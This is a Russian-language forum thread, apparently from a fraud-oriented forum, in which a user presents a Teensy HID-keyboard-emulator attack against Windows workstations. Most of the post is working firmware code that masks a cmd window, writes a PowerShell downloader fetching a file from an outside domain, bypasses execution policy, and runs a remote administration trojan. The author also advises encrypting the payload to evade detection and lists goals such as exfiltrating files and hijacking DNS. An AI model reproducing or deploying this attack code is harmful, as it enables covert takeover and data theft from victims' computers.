1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Teensy как вектор атаки или использование HID-эмуляторa

Тема в разделе "Наши статьи", создана пользователем toorook, 12 июн 2015.

  1. TopicStarter Overlay
    toorook

    toorook

    Регистрация:
    1 апр 2013
    Сообщения:
    34
    Симпатии:
    45
    Бывает так, что сервера и рабочие станции хорошо защищены, снаружи не подобраться, да и на СИ люди не ведутся. Если подкидывать флешки, то пользователи навряд ли запустят какой-нибудь исполняемый файл - уже научены, что это может плохо закончиться.
    Но есть еще один вариант - Teensy . Это устройство на arduino-подобном МК, эмулирующее HID-клавиатуру.

    Оф. сайт - Please login or register to view links
    Купить у китайцев - Please login or register to view links
    Мой девайс купил у китайцев:
    [​IMG]
    Задача такова - необходимо физически подключить устройство, которое “притворится” устройством ввода и самостоятельно выполнит необходимые действия. Эти действия могут быть следущими:
    • отправить информацию о системе/содержимое заданного файла на сайт pastebin.com
    • изменить DNS сервера (т.е. следить за интернет активностью пользователя);
    • загрузить и запустить файл;
    • отредактировать файл HOSTS
    • включить протокол RDP и сконфигурировать его для подключения
    • поднять wifi точку доступа
    Думаю что, замаскировать девайс сможет каждый, это не проблема. Просто взять подходящию по размеру флешку поставить в корпус Teensy . Размеры платы:
    [​IMG]
    Небольшая загвоздка с разьемом подключния. Если паять не умеете/нечем/нехотите, то можно использовать переходник:
    [​IMG]
    Купить у китайцев - Please login or register to view links
    Для компилирования и "заливки" в МК качаем и устанавливаем Arduino и teesyduino
    - Please login or register to view links
    - Please login or register to view links

    Прочитав статью на хабре Please login or register to view links, я отказался от использования VBS . Слижком уж "палевно" окно блокнота, в котором набирается скрипт. Решил использовать Please login or register to view links. Внимание! На Windows XP может не сработать. Т.к. я знаю где его буду использовать, ХР в расчет не беру.
    Код прошики будет делать следущие:
    • Создаст скрипт PowerShell для загрузки файла.
    • Установит право на выполнение скриптов PowerShell
    • Выполнит скрипт загрузки
    • Исполнит загруженый файл - это будет старенький Apocalypse Remote Administration Tool
    Файл будет загружатся в "темповый" каталог.

    Кодил под ubuntu:
    [​IMG]
    В момент прошивки нажать на кнопку на плате:
    [​IMG]
    Код прошивки:
    Код:
    int ledPin = 11; //номер пина, на который уже разведен светодиод
    int complete_flag = 0; //флаг, указывающий, что один цикл программы уже выполнился
    
    void setup() {
    pinMode(ledPin, OUTPUT);
    for(int i=0;i<=2;i++)
    {
    delay(500);  //небольшая задержка для установки драйверов. В это время мигаем светодиодом
    digitalWrite(ledPin,HIGH);
    delay(300);
    digitalWrite(ledPin,LOW);
    } }
     
    
    void loop() {
      if (!complete_flag)
      {
      Keyboard.set_modifier(MODIFIERKEY_LEFT_GUI);
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(1000);
    
      Keyboard.println("cmd");
      Keyboard.println("mode con:cols=40 lines=2");  //маскировка cmd
      Keyboard.println("title Install Drivers...");
       
      delay(1000);
    
      //для загрузки
      Keyboard.println("echo $wc = New-Object System.Net.WebClient > %temp%//download.ps1");
      Keyboard.println("echo $wc\.DownloadFile(\"http:///mydomenwn.com/1cv2.scr\",  \"%temp%\\rat.exe \")  \>>  %temp%//download.ps1 ");
    
      Keyboard.println("powershell");
      delay(1000);
       
      Keyboard.println("Set-ExecutionPolicy Bypass");  //установим права на выполнение скриптов
      delay(1000);   
       
      Keyboard.println("exit");
      Keyboard.println("powershell %temp%//download.ps1"); //запуск скрипта загрузки
      Keyboard.println("powershell %temp%\\.//rat.exe");  //запуск файла
      Keyboard.println("exit");
       
      complete_flag = 1;  //прошивка отработала - ничего не делаем.
      }
    }
    
    Задержки выставляте в записимости от ситуации. Можно поставить меньше.
    Код:
    delay(500);
    Для теста я конектил RAT на локальную машину. Вот скрин за 1 секунду до завершения работы Teensy:
    [​IMG]

    Как видите все прекрасно запустилось и есть полноценный достук к машине. Само собой разумееться "нагрузку" надо криптовать.

    Немного инфы по запуску PowerShell скриптов - Please login or register to view links

    Сам процесс уставновки ПО, написания кода и прошивки МК прошел как по маслу. В дальнейшем напишу скетч (так зовется прошивка) для подмемы доменов в HOSTS.

    Итог:
    Если напрямую пробиться не возможно, надо использовать другие способы. Этим и являеться Teensy. Это конечно не идеальный инструмент, но сбрасывать со счетов не стоит. Минусом этого МК являеться то, что тебе необходимо имень точную информацию о системе жертвы, так же у нее нет обратной связи. Но тем не менее, она работает...
    Так же есть тулза Kautilya - Please login or register to view links. Которая по идее должна делать все за вас, но я с ней как то не сдружился. Слишком уж шаблонно она генерит прошивку. Не всегда рабоает.
    [​IMG]

    :write: Продолжение следует... / to be continued... :write:
     
    • Like Like x 10
    Метки:
  2. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    Тема очень похожа на BadUSB
    Please login or register to view links
     
  3. TopicStarter Overlay
    toorook

    toorook

    Регистрация:
    1 апр 2013
    Сообщения:
    34
    Симпатии:
    45
    Согласен. Но в случае с флешкой, там нужен определеный МК, здесь же все сразу.
     
    • Like Like x 1
    • Agree Agree x 1

Поделиться этой страницей

Загрузка...